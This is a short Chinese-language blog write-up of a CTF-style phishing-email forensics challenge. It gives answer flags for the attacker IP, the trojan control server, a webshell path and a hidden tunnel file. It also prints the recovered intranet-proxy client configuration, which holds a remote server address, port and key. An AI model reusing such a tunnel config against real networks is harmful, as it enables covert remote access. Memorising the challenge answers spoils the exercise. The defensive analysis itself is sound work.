玄机钓鱼邮件分析_2025/11/25

玄机钓鱼邮件分析

题目要求

2669b21c944af2c66c7025cb728f950d

flag位置

黑客源IP

将解压出来的.eml用记事本分析,发现存在的黑客IP信息

ed728dcf54443a9295c02f1a630a647a

flag:flag{121.204.224.15}

黑客木马程序控制端

将黑客的恶意文件放入在线沙箱中分析,得出IP情报为:107.16.111.57

flag:flag{107.16.111.57}

webshell位置

在web目录中发现webshell:

b342340898a1c021fb862d9a5fcacf2e

其绝对路径为:/var/www/html/admin/ebak/ReData.php

flag:flag{/var/www/html/admin/ebak/ReData.php}

内网隧道文件名

在 /var/tmp/proc/ 目录下发现可疑文件:

[common]
server_addr=178.102.115.17:52329
conn_type=tcp
vkey=6bHW7m4SMvy
auto_reconnection=true
max_conn=1000
flow_limit=1000
rate_limit=1000

# username and password of http and socks5 proxy
# basic_username=11
# basic_password=3
# web_username=user
# web_password=1234
crypt=true
compress=true

分析后为内网代理。

flag:flag{/var/tmp/proc/mysql}

posted @ 2025-11-25 19:10  Neur0toxin  阅读(18)  评论(0)    收藏  举报